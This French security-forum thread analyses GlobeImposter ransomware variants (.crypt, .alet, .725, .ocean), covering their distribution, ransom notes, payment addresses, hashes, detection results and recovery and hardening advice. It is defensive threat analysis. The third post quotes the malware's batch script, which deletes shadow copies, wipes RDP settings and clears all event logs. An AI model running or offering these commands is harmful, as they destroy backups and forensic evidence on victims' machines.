GLOBEIMPOSTER RANSOMWARE (.725)

Les malwares de type Ransomware et rançongiciels
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

GLOBEIMPOSTER RANSOMWARE (.725)

par Malekal_morte »

GLOBEIMPOSTER RANSOMWARE est une variante de rançongiciel et Crypto-Ransomware (rançongiciel chiffreur de fichiers).
Courant Juillet une campagne de mail malveillant a fait la promotion de ce type de cette famille GLOBEIMPOSTER.

Microsoft détecte ce dernier en Ransom:Win32/Septrypt, depuis juillet 2017, les campagnes par mail de ce ransomware sont quotidiennes.

Distribution du ransomware GlobeImposter (extension .crypt)

Rien de vraiment nouveau.
Le mail contient une pièce jointe avec un script malveillant (se reporter à la page : Comment se protéger des scripts malicieux sur Windows).
GLOBEIMPOSTER-ransomware-crypt.png
Une fois exécuté, les versions précédentes de fichiers sont supprimés à l'aide de la commande vssadmin.
GLOBEIMPOSTER-ransomware-crypt-2.png
puis les fichiers sont chiffrés et l'extension est modifiée en .crypt
Un fichier instruction contenant les informations de paiement sont aussi placés dans chaque dossier : how_to_back_files.html
GLOBEIMPOSTER-ransomware-crypt-3.png
Le paiement se fait par bitcoin, l'adresse de contact est : [email protected]
GLOBEIMPOSTER-ransomware-crypt-4.png
A noter que le ransomware GLOBEIMPOSTER peut aussi être distribué à travers des piratages RDP.
Plus d'informations :
Piratage de serveurs Windows par Terminal Server


Récupérer les fichiers .crypt

La récupération des fichiers chiffrés par le ransomware .crypt est normalement impossible.
Du moins, les pirates cherchent à ce qu'il n'y est aucun moyen afin de vous obliger à payer.
Surveillez la page suivante, pour une mise à disposition d'un outil spécifique : Outils de décryptage (Decrypt Tools Ransomware)

Vous pouvez tenter de récupérer les fichiers avec Shadow Explorer - versions précédentes
Plus d'informations : Ransomware et récupération de fichiers


Sécuriser son Windows

Afin de sécuriser son Windows et éviter les ransomwares et d'autres menaces connues sur la toile, suivre le tutoriel de sécurisation de son Windows.
Comment se protéger des scripts malveillants sur Windows
et limiter PowerShell : Les virus Powershell

et plus globalement, suivez les conseils de la page : Sécuriser son Windows.
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: GLOBEIMPOSTER RANSOMWARE (.alet)

par Malekal_morte »

Autre variante avec [email protected]
L'extension des fichiers chiffrés est modifié en .alet!
Le fichier instruction est : #_READ_ME_#!.ht

La fenêtre instruction se place en avant plan et ne peut-être fermé, ce qui rend ce ransomware pénible.
Les exécutables se trouvant sur le bureau sont chiffrés.
ransomware-decryptyourfileshereee1-cock-li.png
A noter que le fichier est signé :
https://www.virustotal.com/fr/file/2a36 ... 500414209/
SHA256: 2a36b368de79461ad8d1c55e580566f1fdf50af74d7625d2fb007873c94b7d9b
Nom du fichier : srsp5lnmp.exe
Ratio de détection : 6 / 63
Date d'analyse : 2017-07-18 21:43:29 UTC (il y a 0 minute)

Antivirus Résultat Mise à jour
Emsisoft Trojan.FileCoder (A) 20170718
Endgame malicious (high confidence) 20170713
Invincea heuristic 20170607
Rising Malware.Heuristic!ET#84% (rdm+) 20170718
Symantec ML.Attribute.HighConfidence 20170718
Webroot W32.Trojan.Gen 20170718
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: GLOBEIMPOSTER RANSOMWARE (extension .725)

par Malekal_morte »

Les variantes et campagnes du ransomware Globeimposter continuent, avec une variante poussant l'extension .725
Globeimposter lance un batch qui permet de désactiver tous les shadow copies et supprimer tous les paramètres Terminal Server.
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Les documents chiffrés avec l'extension .725 et le fichier RECOVER-FILES.html dont le contenu a un peu évolué avec un message :
Your files are Encrypted!

For data recovery needs decryptor.

If you want to buy a decryptor, click the button

Your files are Encrypted!

For data recovery needs decryptor.

If you want to buy a decryptor, click the button
globalimposter-variante-725.png
qui mène au site de paiement suivant : hxxps://n224ezvhg4sgyamb.onion.link/efwdaq.php
globalimposter-variante-725-.png
globalimposter-variante-725--.png
Exemple de détection VirusTotal :

SHA256: 72ddceebe717992c1486a2d5a5e9e20ad331a98a146d2976c943c983e088f66b
Nom du fichier : sNNjoOXsMwH.exe
Ratio de détection : 22 / 64
Date d'analyse : 2017-07-28 13:52:45 UTC (il y a 0 minute)
0 4
Analyse
File detail
Informations supplémentaires
Commentaires
Votes
Informations comportementales
Antivirus Résultat Mise à jour
AegisLab Ml.Attribute.Gen!c 20170728
Avast Win32:Malware-gen 20170728
AVG Win32:Malware-gen 20170728
Avira (no cloud) TR/Crypt.Xpack.uodll 20170728
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9888 20170728
CrowdStrike Falcon (ML) malicious_confidence_80% (W) 20170710
Cylance Unsafe 20170728
DrWeb Win32.HLLM.Reset.493 20170728
Endgame malicious (high confidence) 20170721
ESET-NOD32 a variant of Win32/Kryptik.FUYC 20170728
Sophos ML heuristic 20170607
Kaspersky UDS:DangerousObject.Multi.Generic 20170728
McAfee Artemis!4E2B58F99AD9 20170728
McAfee-GW-Edition BehavesLike.Win32.PWSZbot.dc 20170728
eScan Trojan.Agent.CKFN 20170728
Palo Alto Networks (Known Signatures) generic.ml 20170728
Rising Trojan.Ransom.GlobeImposter!1.AC37 (classic) 20170728
SentinelOne (Static ML) static engine - malicious 20170718
Symantec ML.Attribute.HighConfidence 20170728
Tencent Win32.Trojan.Raas.Auto 20170728
Webroot W32.Trojan.Gen 20170728
ZoneAlarm by Check Point UDS:DangerousObject.Multi.Generic 20170728
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Malekal_morte
Messages : 116521
Inscription : 10 sept. 2005 13:57

Re: GLOBEIMPOSTER RANSOMWARE (.725)

par Malekal_morte »

Variante avec extension .ocean et fichier d'instruction de paiement !back_files!.html :
globeimposter-ocean.jpg
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Ransomware »